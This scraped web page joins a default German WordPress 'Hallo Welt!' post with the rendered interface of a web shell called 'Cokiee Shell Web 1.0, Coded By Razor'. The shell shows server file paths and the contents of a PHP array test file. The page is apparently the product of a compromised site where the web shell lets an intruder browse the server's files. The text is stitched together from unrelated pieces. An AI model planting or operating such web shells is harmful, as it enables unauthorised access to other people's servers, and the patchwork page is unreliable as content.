Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/standard/tests/array/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/standard/tests/array/bug42838.phpt |
--TEST-- Bug #42838 (Wrong results in array_diff_uassoc()) --FILE-- <?php function key_compare_func($a, $b) { if ($a === $b) { return 0; } return ($a > $b)? 1:-1; } $array1 = array("a" => "green", "b" => "Brown", 'c' => 'blue', 0 => 'red'); $array2 = array("a" => "green", "b" => "Brown", 'c' => 'blue', 0 => 'red'); $result = array_diff_uassoc($array1, $array2, "key_compare_func"); print_r($result); ?> --EXPECT-- Array ( )
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare